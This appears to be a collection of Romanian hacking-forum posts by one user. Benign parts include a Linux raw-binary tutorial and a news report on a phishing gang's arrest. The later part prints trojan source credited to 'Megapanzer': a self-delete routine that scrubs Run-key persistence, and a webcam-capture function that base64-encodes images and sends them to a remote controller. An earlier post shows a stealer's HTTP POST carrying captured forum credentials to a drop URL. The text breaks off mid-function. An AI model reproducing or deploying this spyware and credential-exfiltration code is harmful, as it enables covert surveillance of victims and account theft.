Nytro

E posibil sa fac o versiune ( 4.0 ) FUD, dar va fi privata un timp.

Vezi tutorialul meu, apar acolo toate codurile si mai sunt si putin explicate.

O sa pun sa se poata edita acele lucruri.

Are nevoie de .NET 2.0 daca a selectat asa DrGrim, sau de .NET 3.5 daca nu a selectat la "New Project", dar normal nu are nevoie de 3.5. Si cam orice ai scrie in VB2008 e FUD, dar nu suport faptul ca trebuie .NET 2.0 minim.

Poate, dar cred ca eu cant mai frumos )

Iar nu imi plac fonturile

Imi e lene, se pot lua usor, in cel mai rau caz cu un packet sniffer. Datele se trimit prin POST catre: http://www.infraburo.co.za/documents/system/logs.php POST /documents/system/logs.php HTTP/1.0 Connection: keep-alive Content-Type: multipart/form-data; boundary=--------031609160339281 Content-Length: 262 Host: www.infraburo.co.za Accept: text/html, */* User-Agent: Mozilla/3.0 (compatible; Indy Library) ----------031609160339281 Content-Disposition: form-data; name="mata" ______________________________<br>http://rstcenter.com<br>vb_login_username = UnTest<br>*newpasswordconfirm = *******<br>______________________________<br> ----------031609160339281--

Totusi sa nu generalizati: Nu toti cei care asculta manele fac asa. A, da. Nu numai ascultatorii de manele canta, canta si altii, dar la alt gen muzical vi se pare normal acest lucru rasistilor.

vBulletin Spammer e FF Stealer, asta nu cred ca e altceva. Are ban. Oricum nu folosesc Firefox, nu are ce fura.

Stealer, ban

Ciudat: http://www.virustotal.com/ro/analisis/27e475f3ad40de7f454d16466e65a44d Nothing found L-am rulat, nu s-a intamplat nimic. Am vazut la importuri Winsock API... Nu e nimic la startup, nici un proces, nimic. Nu stiu ce sa zic.

cat > a.out Writing Linux programs in raw binary by G-Brain C Let's begin with Linux system calls. A system call is a request made by a program to the operating system for performing certain tasks. System calls provide the interface between a process and the operating system. A good example of a Linux system call is _exit: void _exit(int status) The function _exit() terminates the calling process "immediately". Any open file descriptors belonging to the process are closed; any children of the process are inherited by process 1, init, and the process's parent is sent a SIGCHLD signal. The value of status is returned to the parent process as the process's exit status. In a C program, you could use _exit like this: _exit(0) Ending the program with a status of 0, indicating success. Another example of a system call is write: ssize_t write(int fd, const void *buf, size_t count) write() writes up to count bytes from the buffer pointed buf to the file referred to by the file descriptor fd. On success, the number of bytes written is returned (zero indicates nothing was written). On error, -1 is returned, and errno is set appropriately. Here's how you'd use write() from a C program: write(1,"Test\n",5) There are 3 standard POSIX file descriptors (Linux complies to this part of the POSIX standard): 0 = Standard Input (stdin) 1 = Standard Output (stdout) 2 = Standard Error (stderr) So what the above line of code would do, is write "Test\n" up to the 5th byte to file descriptor 1, standard output. That should explain how system calls work. System call table: http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html To get system call documentation, use man 2 syscall For example: man 2 write Here's a C program using the two syscalls we learned: syscall.c #include <unistd.h> int main() { write(1,"Test\n",5); _exit(); } To compile: $ gcc -o syscall syscall.c To see what system calls are being made, use strace: $ strace ./syscall execve("./syscall", ["./syscall"], [/* 42 vars */]) = 0 brk(0) = 0x804a000 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory) open("/etc/ld.so.cache", O_RDONLY) = 3 fstat64(3, {st_mode=S_IFREG|0644, st_size=136536, ...}) = 0 mmap2(NULL, 136536, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fc2000 close(3) = 0 open("/lib/libc.so.6", O_RDONLY) = 3 read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360d\1"..., 512) = 512 fstat64(3, {st_mode=S_IFREG|0755, st_size=1575187, ...}) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc1000 mmap2(NULL, 1357360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e75000 mmap2(0xb7fbb000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x146) = 0xb7fbb000 mmap2(0xb7fbe000, 9776, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fbe000 close(3) = 0 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e74000 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e746c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 mprotect(0xb7fbb000, 4096, PROT_READ) = 0 munmap(0xb7fc2000, 136536) = 0 write(1, "Test\n", 5Test ) = 5 exit_group(0) = ? Process 3492 detached Never mind that stuff at the top, you can see our two system calls being executed at the bottom. Assembler Try opening the executable we created above (syscall) in a hex editor. It's huge, and it's full of stuff we don't need. Surely, we could use some GCC flags to make it smaller, but to really understand what's going on, we'll have to write our stuff in assembler. syscall2.asm format ELF executable entry _start segment readable executable _start: mov al, 4 mov bl, 1 mov ecx, message mov dl, messageLen call 0xffffe414 mov al, 1 mov bl, 0 call 0xffffe414 segment readable writable message db 'Test',0x0a messageLen = $-message Which can be assembled using the following command: $ fasm syscall2.asm Note that we're using fasm, the flat assembler (http://www.flatassembler.net) because it produces neat code, and doesn't clutter our executables like nasm does. Let's go through the code: format ELF executable entry _start We want an ELF executable, and we want it to start at _start. segment readable executable A.K.A section .text. This tells the assembler that everything under this line will be readable and executable (=code) unless stated otherwise (with a new "segment" instruction). _start: This is the entry point of our program. mov al, 4 mov bl, 1 mov ecx, message mov dl, messageLen call 0xffffe414 Woah, what's that? I'll tell you what it is: write(1,"Test\n",5) The syscall number for write() is 4, 1 is standard output, message is "Test\n", messageLen is 5, and call 0xffffe414 calls the kernel. So what we do is, we put the syscall number in the al register, the arguments in the other registers and then we call the kernel with call 0xffffe414. Pretty easy. Now, the memory location 0xffffe414 might need a bit of explanation: Since Linux 2.5.53 there is a fixed page, called the vsyscall page, filled by the kernel. At kernel initialization time the routine sysenter_setup() is called. It sets up a non-writable page and writes code for the sysenter instruction if the CPU supports that, and for the classical int 0x80 otherwise. Thus, the C library can use the fastest type of system call by jumping to a fixed address in the vsyscall page. The vsycall page is mapped in the memory of every process at 0xffffe000-0xffffefff. To read the vsyscall page: get_vsyscall_page.c #include <unistd.h> #include <string.h> int main() { char *p = (char *) 0xffffe000; char buf[4096]; memcpy(buf, p, 4096); write(1, buf, 4096); return 0; } $ gcc -o get_vsyscall_page get_vsyscall_page.c $ ./get_vsyscall_page > vsyscall_page $ objdump -d vsyscall_page syscall_page: file format elf32-i386 Disassembly of section .text: ffffe400 <__kernel_sigreturn>: ffffe400: 58 pop %eax ffffe401: b8 77 00 00 00 mov $0x77,%eax ffffe406: cd 80 int $0x80 ffffe408: 90 nop ffffe409: 8d 76 00 lea 0x0(%esi),%esi ffffe40c <__kernel_rt_sigreturn>: ffffe40c: b8 ad 00 00 00 mov $0xad,%eax ffffe411: cd 80 int $0x80 ffffe413: 90 nop ffffe414 <__kernel_vsyscall>: ffffe414: 51 push %ecx ffffe415: 52 push %edx ffffe416: 55 push %ebp ffffe417: 89 e5 mov %esp,%ebp ffffe419: 0f 34 sysenter ffffe41b: 90 nop ffffe41c: 90 nop ffffe41d: 90 nop ffffe41e: 90 nop ffffe41f: 90 nop ffffe420: 90 nop ffffe421: 90 nop ffffe422: eb f3 jmp ffffe417 <__kernel_vsyscall+0x3> ffffe424: 5d pop %ebp ffffe425: 5a pop %edx ffffe426: 59 pop %ecx ffffe427: c3 ret As you can see, on my system __kernel_vsyscall is at memory location 0xffffe414. This is what we'll use to call the kernel. If the address is different on your system, use that instead. Let's move on: mov al, 1 mov bl, 0 call 0xffffe414 System call 1 is exit, it's first argument status is 0, so we get: _exit(0) Makes sense, right? On with the show: segment readable writable message db 'Test',0x0a messageLen = $-message readable, writable = data db = define byte $ = the current address. Define message as an array of bytes. Define messageLen as the current address minus the address of message. This is a cool trick to calculate string length. Now, let's strace our program to see how awesome it is: $ fasm syscall2.asm $ strace ./syscall2 execve("./syscall2", ["./syscall2"], [/* 43 vars */]) = 0 write(1, "Test\n", 5Test ) = 5 _exit(0) = ? Process 3627 detached Two beautiful syscalls. Hexadecimal Let's take a look at the syscall2 executable we produced in hexadecimal. I'll be using emacs' hexl-mode. Use whatever you like. 87654321 0011 2233 4455 6677 8899 aabb ccdd eeff 0123456789abcdef 00000000: 7f45 4c46 0101 0100 0000 0000 0000 0000 .ELF............ 00000010: 0200 0300 0100 0000 7480 0408 3400 0000 ........t...4... 00000020: 0000 0000 0000 0000 3400 2000 0200 2800 ........4. ...(. 00000030: 0000 0000 0100 0000 7400 0000 7480 0408 ........t...t... 00000040: 7480 0408 1900 0000 1900 0000 0500 0000 t............... 00000050: 0010 0000 0100 0000 8d00 0000 8d90 0408 ................ 00000060: 8d90 0408 0500 0000 0500 0000 0600 0000 ................ 00000070: 0010 0000 b004 b301 b98d 9004 08b2 05e8 ................ 00000080: 9063 fbf7 b001 b300 e887 63fb f754 6573 .c........c..Tes 00000090: 740a t. Now what the hell is that? Well, actually, it's not that hard. You just need to have the right documents. The outer parts are added by hexl-mode, they indicate the address of each byte. The first part is just the ELF header, up to 0x74, where our actual program is loaded: b004 b301 b98d 9004 08b2 05e8 9063 fbf7 b001 b300 e887 63fb f754 6573 740a That's it. That's our whole program. Seriously. Let's try translating it back to assembler: Reading the Intel Software Developers Manual Volume 2A (http://download.intel.com/design/processor/manuals/253666.pdf) Appendix A: Opcode map, we discover the following: b0 means: move immediate byte into the AL register (referring to the next byte, 04) b0 04 mov al, 4 b3 means: move immediate byte into BL register b3 01 mov bl, 1 b9 means: move immediate word or double into the eCX register (referring to 8d 90 04 08) 8d 90 04 08 is the address of message. It's reversed because I'm on a little-endian architecture. 0x0804908d is where our data is loaded, and message is the first piece of data, so it's at offset 0, which is address 0x0804908d again. b9 8d 90 04 08 mov ecx, message b2 means: move immediate byte into DL register b2 05 mov dl, messageLen And to top it off... call the kernel! e8 means: call the next offset to be added to the instruction pointer register. e8 90 63 fb f7 call 0xffffe414 Now how does 90 63 fb f7 translate to 0xffffe414? Firstly, my byte order is little endian, so the actual address is 0xf7fb6390 (putting the bytes in reverse order). How do we get to this number? We take the address we want to call, 0xffffe414 and we subtract it by the instruction pointer (the starting point of our program, 0x08048074 plus the size of the instructions so far, which is 0x10, resulting in 0x08048084). So: (addr - ip) (0xffffe414 - (0x08048074 + 0x10)) = 0xf7fb6390 One more time from the beginning: write(1,"Test\n",5); mov al, 4 mov bl, 1 mov ecx, message mov dl, messageLen call 0xffffe414 b0 04 b3 01 b9 8d 90 04 08 b2 05 e8 90 63 fb f7 It makes perfect sense! Now, for exiting: exit(0); mov al, 1 mov bl, 0 call 0xffffe414 b0 01 b3 00 e8 87 63 fb f7 Note that these are 9 bytes, so the instruction pointer increases by 9, resulting in: (0xffffe414 - (0x08048074 + 0x19)) = 0xf7fb6387 As the address to call. And the last part.... 54 65 73 74 0a Test\n Now the whole thing one more time: write(1,"Test\n",5); exit(0); mov al, 4 mov bl, 1 mov ecx, message mov dl, messageLen call 0xffffe414 mov al, 1 mov bl, 0 call 0xffffe414 message db 'Test',0x0a messageLen = $-message b0 04 b3 01 b9 8d 90 04 08 b2 05 e8 90 63 fb f7 b0 01 b3 00 e8 87 63 fb f7 54 65 73 74 0a You can read hexadecimal! Binary At last, you will find out how to write programs in binary. Hexadecimal is actually shorthand for binary, so the right numbers are already there, we just have to convert from base 16 (hex) to base 2 (bi). Here's a table: 0: 0000 1: 0001 2: 0010 3: 0011 4: 0100 5: 0101 6: 0110 7: 0111 8: 1000 9: 1001 A: 1010 B: 1011 C: 1100 D: 1101 E: 1110 F: 1111 So let's try to convert "Test\n" to binary. Here's it in hexadecimal: 54 65 73 74 0a 5 hexadecimal is 0101 binary. 4 hexadecimal is 0100 binary. 54 hexadecimal is 0101 0100 binary! The full string: T e s t \n 5 4 6 5 7 3 7 4 0 a 0101 0100 0110 0101 0111 0011 0111 0100 0000 1010 It's that simple! You can just convert all the numbers individually. For more about base conversion, Google it. Converting our entire program to binary is simple: b0 04 b3 01 b9 8d 90 04 08 b2 05 e8 90 63 fb f7 b0 01 b3 00 e8 90 63 fb f7 54 65 73 74 0a 1011 0000 0000 0100 1011 0011 0000 0001 1011 1001 1000 1101 1001 0000 0000 0100 0000 1000 1011 0010 0000 0101 1110 1000 1001 0000 0110 0011 1111 1011 1111 0111 1011 0000 0000 0001 1011 0011 0000 0000 1110 1000 1001 0000 0110 0011 1111 1011 1111 0111 0101 0100 0110 0101 0111 0011 0111 0100 0000 1010 And that's all there is to it! Of course, a sequence of bits like that is unmaintainable, but now you know: how it works. Comments? Suggestions? Drop me a line at g-brain@g-brain.net.

Google Chrome

Un string array cu codurile ASCII ale caracterelor parolei.

Edit: CrackMe: http://rapidshare.com/files/208819072/Project1.exe

Daca scri parola corect afiseaza "10" ?

The Romanian Police, together with D.I.I.C.O.T. (the Direction for Investigating Organized Crime and Terrorism), has executed an ample operation that has targeted hackers in the western part of the country. Between 15 and 20 persons have been arrested in the cities of Caransebe?, Lugoj, Timi?oara, Hunedoara and Pite?ti under the suspicion of being members of a cybercriminal group. The gang is accused of executing phishing attacks and siphoning money from compromised accounts. According to local media, they cloned the websites of several banks in Spain and Italy, which they subsequently used to lure people into disclosing their financial information. The Italian Post Office seems to have been the group's main target. The fraudsters sent e-mails impersonating the institution, in which they claimed that customer data had been lost due to technical issues. A link included in the e-mail directed unsuspecting victims to a page masquerading as the Post Office's online payment system. Once on the page, users were asked to input their financial details, which were then being stored on a server under the control of the Romanian phishers. The gang's M.O. involved "money mules" (people hired to pick up stolen funds) walking into post offices and letting them know via mobile phones that they were good to go. The Romanians then issued online money orders using the banking information of their victims. This allowed the mules to cash in the money and leave in a matter of minutes. Speed was vital to the whole scheme, as the system also sent SMS notifications of the transaction to the mobile phone number provided by the real account holder. In addition, in order to avoid arising suspicion from the post office employees, the transactions only involved sums of under 1,000 euros. The compromised accounts were also being used to recharge mobile pre-paid SIM cards, heavily used for communication. One of the arrested individuals, Flavius Br?g?il?, a 21-year-old man from Caransebe?, is suspected of being the head behind the whole operation. According to authorities, he had been coordinating the entire cybercriminal network, which was devised into independent cells operating from different Romanian and Italian cities. Ovidiu Andra?, son of the manager of the BCR (Romanian Commercial Bank) branch in Caransebe?, was also one of the individuals who were arrested. It was also noted that one of the detained persons was accused of hacking into several servers belonging to N.A.S.A. and various U.S. universities and using them to launch attacks that targeted banks. Details about this are yet scarce, but it is possible that these servers have been used to host the fake cloned websites. Cosmin Bolosin, the attorney for four of the people detained in Caransebe?, commented for Caras Online that "[…] Even though people are speaking about those NASA servers, for the time being we haven't been presented with anything official in this respect. […] As far as the penal procedure is concerned, I can confirm that it has been fully respected and that the search warrants were legal. I was even a bit surprised." Meanwhile, the D.I.I.C.O.T. prosecutors pointed out that the network had been under surveillance for the past year. Sursa: http://news.softpedia.com/news/Romanian-Police-Takes-Down-Cybercriminal-Gang-106717.shtml

Nu stiu nimic de rezultate, nu am primit nimic, diriga mi-a spus din surse neoficiale ca s-ar putea sa fi luat primul loc. luyzette: Ai fost la prezentare? Sau doar la chestia aia in amfiteatru cand au vorbit aia si au pus 2 videoclipuri: Romania si Tg. Jiu?

Nu trece mai de nimic

Ma pricep eu... La dat ban.

Algoritmul tau de decryptare mai e bun?

RS Mirror: http://rapidshare.com/files/207975537/CQKiller.rar

B.o.t Killer by a59 This function searches through all running processes, except black listed ones, and then uses the ReadProcessMemory function to check for specified strings found in common bots. If any of the strings are found in the processes memory the process will be killed and the file deleted. Should be simple to modify for other types of unwanted programs. /* BotKiller Coded by a59 */ #include <windows.h> #include <stdio.h> #include <tlhelp32.h> void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 ); void KillBot( PROCESSENTRY32 pe32 ); struct s_Search { char* szBot; char* szString; }; s_Search sSearch[ ] = { { "VNC Scanning server", "\x52\x46\x42\x20\x30\x30\x33\x2E\x30\x30\x38\x0A" }, { "RXBot", "[MAIN]" }, { "RXBot", "[SCAN]" }, { "RXBot", "[FTP]" }, { "Unknown", "&echo bye" }, { NULL, NULL } }; void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 ) { char szBigBuffer[ 0x5000 ] = { 0 }; unsigned char Curbuf[ 0x500 ] = { 0 }; HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID ); printf( "Scanning PID: %d [ %s ]\nStart Address: 0x%08X End Address: 0x%08X\n\n", pe32.th32ProcessID, pe32.szExeFile, uStartAddr, uEndAddr ); for( unsigned long uCurAddr = uStartAddr; uCurAddr <= uEndAddr; uCurAddr++ ) { BOOL bRead = ReadProcessMemory( hProcess, (void *)uCurAddr, (void *)&Curbuf, sizeof( Curbuf ), NULL ); if( bRead ) { int c = 0; strcat( szBigBuffer, (char *)Curbuf ); while( sSearch[ c ].szString != NULL ) { if( strstr( szBigBuffer, sSearch[ c ].szString ) ) { printf( "Found string \"%s\" in \"%s\" server \"%s\"\n\n", sSearch[ c ].szString, pe32.szExeFile, sSearch[ c ].szBot ); KillBot( pe32 ); } c++; } if( sizeof( szBigBuffer ) > 0x150 ) ZeroMemory( szBigBuffer, sizeof( szBigBuffer ) ); } if( !bRead ) break; } CloseHandle( hProcess ); }; void KillBot( PROCESSENTRY32 pe32 ) { MODULEENTRY32 me32 = { 0 }; HANDLE hPath = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, pe32.th32ProcessID ); HANDLE hKillProcess; me32.dwSize = sizeof( me32 ); BOOL bRetval = Module32First( hPath, &me32 ); while( bRetval ) { if( !strcmp( pe32.szExeFile, me32.szModule ) ) { SetFileAttributes( me32.szExePath, FILE_ATTRIBUTE_NORMAL ); hKillProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID ); TerminateProcess( hKillProcess, 0 ); Sleep( 500 ); if( DeleteFile( me32.szExePath ) ) printf( "Terminated and deleted %s\n", me32.szExePath ); } bRetval = Module32Next( hPath, &me32 ); } CloseHandle( hKillProcess ); CloseHandle( hPath ); }; int main( ) { char szFile[ 128 ]; GetModuleFileName( GetModuleHandle( NULL ), szFile, sizeof( szFile ) ); char* szBlockList[ ] = { "explorer.exe", "hidserv.exe", "WINLOGON.EXE", "SERVICES.EXE", szFile }; HANDLE hProcess = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); PROCESSENTRY32 pe32; pe32.dwSize = sizeof( PROCESSENTRY32 ); BOOL bRetval = Process32First( hProcess, &pe32 ); bool bDoSearch = true; while( bRetval ) { Sleep( 250 ); for( int i = 0; i < ( sizeof( szBlockList ) / sizeof( char* ) ); i++ ) { if( strstr( szBlockList[ i ], pe32.szExeFile ) ) bDoSearch = false; } if( bDoSearch ) { DoSearch( 0x00400000, 0x004FFFFF, pe32 ); DoSearch( 0x00100000 ,0x001FFFFF, pe32 ); } else bDoSearch = true; bRetval = Process32Next( hProcess, &pe32 ); } CloseHandle( hProcess ); printf( "Done scanning, press ENTER to exit this program.\n" ); getchar( ); return 0; }; Self Delete Credit: carrumba #include <windows.h> #include <stdio.h> #include <shlwapi.h> #include <time.h> #include "Megapanzer_Definitions.h" extern char gRealRegistryName[MAX_BUF_SIZE + 1]; int selfDelete() { WIN32_FIND_DATA lFileData; HANDLE lSearchHandle; char lFilePattern[MAX_BUF_SIZE + 1]; char lTemp[MAX_BUF_SIZE + 1]; char lTempDirectory[MAX_BUF_SIZE + 1]; char lCWD[MAX_BUF_SIZE + 1]; char lBatchFileNameFullPath[MAX_BUF_SIZE + 1]; char lCommand[MAX_BUF_SIZE + 1]; char lProgramName[MAX_BUF_SIZE + 1]; HKEY lRegistryHeaps[] = {HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, NULL}; HKEY lKeyHandle; long lEnumRet = 0; DWORD lLength = 100; time_t lTimeStamp; int lRetVal = 0; int lFuncRetVal = 0; int lCounter = 0; int lCounter2 = 0; //// // initialization //// ZeroMemory(lProgramName, sizeof(lProgramName)); ZeroMemory(lTemp, sizeof(lTemp)); ZeroMemory(lTempDirectory, sizeof(lTempDirectory)); ZeroMemory(lCWD, sizeof(lCWD)); ZeroMemory(lBatchFileNameFullPath, sizeof(lBatchFileNameFullPath)); ZeroMemory(&lTimeStamp, sizeof(lTimeStamp)); GetModuleFileName(NULL, lProgramName, sizeof(lProgramName)); time(&lTimeStamp); //// // create temporary directory //// if (GetTempPath(sizeof(lTempDirectory) - 1, lTempDirectory) > 0) if (lTempDirectory[strlen(lTempDirectory) - 1] != '\\') strcat(lTempDirectory, "\\"); //// // generate batch file name //// GetCurrentDirectory(sizeof(lCWD) - 1, lCWD); if (lCWD[strlen(lCWD) - 1] != '\\') strcat(lCWD, "\\"); _snprintf(lBatchFileNameFullPath, sizeof(lBatchFileNameFullPath) - 1, "%s%d.bat", lTempDirectory, lTimeStamp); printToFile(lBatchFileNameFullPath, "@echo off"); printToFile(lBatchFileNameFullPath, ":Repeat"); ZeroMemory(lCommand, sizeof(lCommand)); _snprintf(lCommand, sizeof(lCommand) - 1, "@del /F \"%s\"", lProgramName); printToFile(lBatchFileNameFullPath, lCommand); ZeroMemory(lCommand, sizeof(lCommand)); _snprintf(lCommand, sizeof(lCommand) - 1, "if exist \"%s\" goto Repeat", lProgramName); printToFile(lBatchFileNameFullPath, lCommand); //// // generate delete entry for registry keys/values //// for(lCounter = 0; lRegistryHeaps[lCounter] != NULL; lCounter++) { if (RegOpenKeyEx(lRegistryHeaps[lCounter], "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_READ, &lKeyHandle) == ERROR_SUCCESS) { lCounter2 = 0; ZeroMemory(lTemp, sizeof(lTemp)); lLength = sizeof(lTemp) - 1; while((lEnumRet = RegEnumValue(lKeyHandle, lCounter2, lTemp, &lLength, NULL, NULL, NULL, NULL)) == ERROR_SUCCESS) { if (StrCmpNI(gRealRegistryName, lTemp, sizeof(gRealRegistryName)) == 0) { ZeroMemory(lCommand, sizeof(lCommand)); if (lRegistryHeaps[lCounter] == CURRENT_USER) { _snprintf (lCommand, sizeof(lCommand) - 1, "@reg delete HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\ /v %s /f",lTemp); printToFile(lBatchFileNameFullPath, lCommand); } else if (lRegistryHeaps[lCounter] == LOCAL_MACHINE) { _snprintf (lCommand, sizeof(lCommand) - 1, "@reg delete HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\ /v %s /f",lTemp); printToFile(lBatchFileNameFullPath, lCommand); } // if (lRegistryHeaps[lCou... } // if (StrCmpNI(gRealRegistryName, lTemp... lLength = sizeof(lTemp) - 1; lCounter2++; ZeroMemory(lTemp, sizeof(lTemp)); } // while((lEnumRet = RegEnumValue(lKeyH... RegCloseKey(lKeyHandle); } // if (RegOpenKeyEx(lReg... } // for(lCounter = 0; lRegistryHeaps[lCoun... //// // delete Mega Panzer files //// ZeroMemory(lCommand, sizeof(lCommand)); _snprintf(lCommand, sizeof(lCommand) - 1, "@del /F \"%s\" || move /Y \"%s\" \"%s\"", lBatchFileNameFullPath, lBatchFileNameFullPath, lTempDirectory); printToFile(lBatchFileNameFullPath, lCommand); //// // run batch script //// ShellExecute(NULL, NULL, lBatchFileNameFullPath, NULL, "c:\\", SW_HIDE); exit(lRetVal); } int printToFile(char *pOutputFileName, char* pCommandString) { int lRetVal = 0; HANDLE lFileHandle = INVALID_HANDLE_VALUE; DWORD lBytesWritten = 0; char lTemp[MAX_BUF_SIZE + 1]; if ((lFileHandle = CreateFile(pOutputFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE) { SetFilePointer(lFileHandle, 0, 0, FILE_END); ZeroMemory(lTemp, sizeof(lTemp)); snprintf(lTemp, sizeof(lTemp) - 1 , "%s\r\n", pCommandString); WriteFile(lFileHandle, lTemp, strlen(lTemp), &lBytesWritten, NULL); CloseHandle(lFileHandle); } return(lRetVal); } WebCam Capture Credit: carrumba #include <stdio.h> #include <windows.h> #include <Vfw.h> #include "Megapanzer_Definitions.h" extern HWND gWND; DWORD WINAPI sendWebcamCaptureInfos(PVOID pParameter) { HWND lWndVideoHandle; CAPSTATUS lCapStat; DWORD lRetVal = 0; char *lBMPFileName = "info.bmp"; char *lJPGFileName = "info.jpg"; char lJPGFileBaseName[MAX_BUF_SIZE + 1]; HANDLE lFileHandle = INVALID_HANDLE_VALUE; DWORD lJPGFileSize = 0; char *lPreEncodedData = NULL; char *lEncodedData = NULL; DWORD lBytesRead = 0; char lTemp[MAX_BUF_SIZE + 1]; int lFuncRetVal = 0; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; SYSTEMTIME lSystemTime; /* * initialize values */ ZeroMemory(&lCapStat, sizeof(CAPSTATUS)); ZeroMemory(&lSystemTime, sizeof(lSystemTime)); ZeroMemory(lJPGFileBaseName, sizeof(lJPGFileBaseName)); GetLocalTime(&lSystemTime); snprintf(lJPGFileBaseName, sizeof(lJPGFileBaseName) - 1, "%04d-%02d-%02d-%02d-%02d-%02d.jpg", lSystemTime.wYear, lSystemTime.wMonth, lSystemTime.wDay, lSystemTime.wHour, lSystemTime.wMinute, lSystemTime.wSecond); ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "<webcam>"); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); /* * capture webcam frame */ Sleep(500); lWndVideoHandle = capCreateCaptureWindow("WebCam",WS_CHILD, 0, 0, 320, 240,(HWND) gWND, (int) 1); capDriverConnect(lWndVideoHandle, 0); Sleep(1000); capGetStatus(lWndVideoHandle, &lCapStat, sizeof(CAPSTATUS)); capGrabFrame(lWndVideoHandle); capEditCopy(lWndVideoHandle); capFileSaveDIB(lWndVideoHandle, lBMPFileName) ; capDriverDisconnect(lWndVideoHandle) ; DestroyWindow(lWndVideoHandle); convertBMP2JPG(lBMPFileName, lJPGFileName); if ((lFileHandle = CreateFileA(lJPGFileName, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE) { lJPGFileSize = GetFileSize(lFileHandle, 0); /* * encocd created jpg file */ if ((lPreEncodedData = (char *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lJPGFileSize * 2)) != NULL) { ReadFile(lFileHandle, lPreEncodedData, lJPGFileSize, (unsigned long *) &lBytesRead, NULL); CloseHandle(lFileHandle); if ((lEncodedData = (char *) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, lJPGFileSize * 2)) != NULL) { /* * transfer picture data to home system */ Base64encode(lEncodedData, lPreEncodedData, lBytesRead); ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "<filename>%s</filename><filecontent>", lJPGFileBaseName); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lEncodedData, Base64encode_len(lBytesRead) - 1, 0); ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "</filecontent>"); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); } // if ((lEncodedData = (char *) He... } // if ((lPreEncodedData = (char *) HeapAlloc(GetP... } // if ((lFileHandle = CreateFileA(lJPGFileFullPath,... ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "</webcam>"); lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); /* * cleaning up before returning */ DeleteFile("info.bmp"); DeleteFile("info.jpg"); return(lRetVal); } Kill Process by PID Credit: carrumba #include <stdio.h> #include <windows.h> #include <psapi.h> #include "Megapanzer_Definitions.h" DWORD WINAPI killProcessByPID(PVOID pParameter) { int lRetVal = 0; HANDLE lProcessHandle = INVALID_HANDLE_VALUE; char lTemp[MAX_BUF_SIZE + 1]; char lProcessName[MAX_BUF_SIZE + 1]; int lFuncRetVal = 0; PANZER_COMMAND *lCommandStructure = (PANZER_COMMAND *) pParameter; HMODULE lModuleHandle; DWORD cbNeeded; ZeroMemory(lProcessName, sizeof(lProcessName)); strcpy(lProcessName, "Unknown"); ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "<killprocess><msg>Could not kill process \"%s\"</msg></killprocess>", lCommandStructure->sCommandString); if ((lProcessHandle = OpenProcess(PROCESS_TERMINATE, FALSE, atoi(lCommandStructure->sCommandString))) != INVALID_HANDLE_VALUE) { if (EnumProcessModules(lProcessHandle, &lModuleHandle, sizeof(lModuleHandle), &cbNeeded)) GetModuleBaseName(lProcessHandle, lModuleHandle, lProcessName, sizeof(lProcessName) - 1); if (TerminateProcess(lProcessHandle, (DWORD) -1)) { ZeroMemory(lTemp, sizeof(lTemp)); _snprintf(lTemp, sizeof(lTemp) - 1, "<killprocess><msg>Killed process \"%s\" (pid %s) successfully</msg></killprocess>", lProcessName, lCommandStructure->sCommandString); } CloseHandle(lProcessHandle); } lFuncRetVal = send(lCommandStructure->lRemoteSocket, lTemp, strlen(lTemp), 0); return(lRetVal); } Kill Process By name Credit: carrumba #include <stdio.h> #include <windows.h> #include <Tlhelp32.h> #include "Megapanzer_Definitions.h" DWORD WINAPI killProcessByName(PVOID pParameter) { int lRetVal = 0; int lFuncRetVal = 0; char lTemp[MAX_BUF_SIZE + 1]; PANZER_COMMAND 